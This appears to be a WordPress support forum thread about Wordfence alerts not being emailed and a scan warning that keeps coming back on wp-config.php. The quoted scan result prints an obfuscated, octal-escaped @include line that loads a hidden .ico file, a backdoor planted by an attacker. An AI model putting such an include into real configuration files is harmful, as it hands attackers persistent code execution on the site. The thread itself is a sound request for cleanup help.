    I receive notifications for all other sites, but on one particular site I don’t get notified when alerts come up each time. My settings are as follows and I’ve tripled checked to make sure the email is correct. I have no spam in that inbox.

    Also, every 4 days after cleaning I get the same errors. I need to prevent this once and for all. They all say something like this:

    Filename: wp-config.php
    File Type: WordPress Configuration File
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: @include “\057/\150o\155e\057c\154e\141r\142e\154i\145f\1637\057p\165b\154i\143_\150t\155l\057w\160-\141d\155i\156/\143s\163/\143o\154o\162s\057.\061b\064c\0630\1429\056i\143o”;

    The infection type is: Suspicious:PHP/obfuicoinclude
    Description: Suspicious code often added by attackers

    I’ve specifically added this to my htaccess file and still no luck 🙁

    <files wp-config.php>
    order allow,deny
    deny from all
    </files>

    This is your main configuration file and cannot be deleted. It must be cleaned manually.

    With regards the unsent alerts, Wordfence uses the WordPress mail function to send mail so WordPress is unable to send mail for some reason. You can ask your hosting provider and ask them if they can see why WordPress is unable to send mail.
